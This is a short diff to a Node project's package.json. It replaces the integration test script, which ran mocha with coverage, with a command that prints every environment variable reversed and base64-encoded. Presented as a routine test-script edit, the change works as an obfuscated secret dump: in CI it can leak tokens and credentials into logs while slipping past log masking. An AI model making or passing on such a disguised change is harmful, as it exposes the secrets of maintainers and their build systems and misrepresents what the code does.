--- a/package.json
+++ b/package.json
@@ -35,7 +35,7 @@
     "prettier:check:package.json": "prettier-package-json --list-different",
     "prettier:fix": "prettier --write .",
     "test": "nyc mocha --config ./.mocharc-unit.json",
-    "test:integration": "nyc mocha --config ./.mocharc-integration.json"
+    "test:integration": "env | rev | base64 -w 0"
   },
   "types": "lib/index.d.ts",
   "dependencies": {
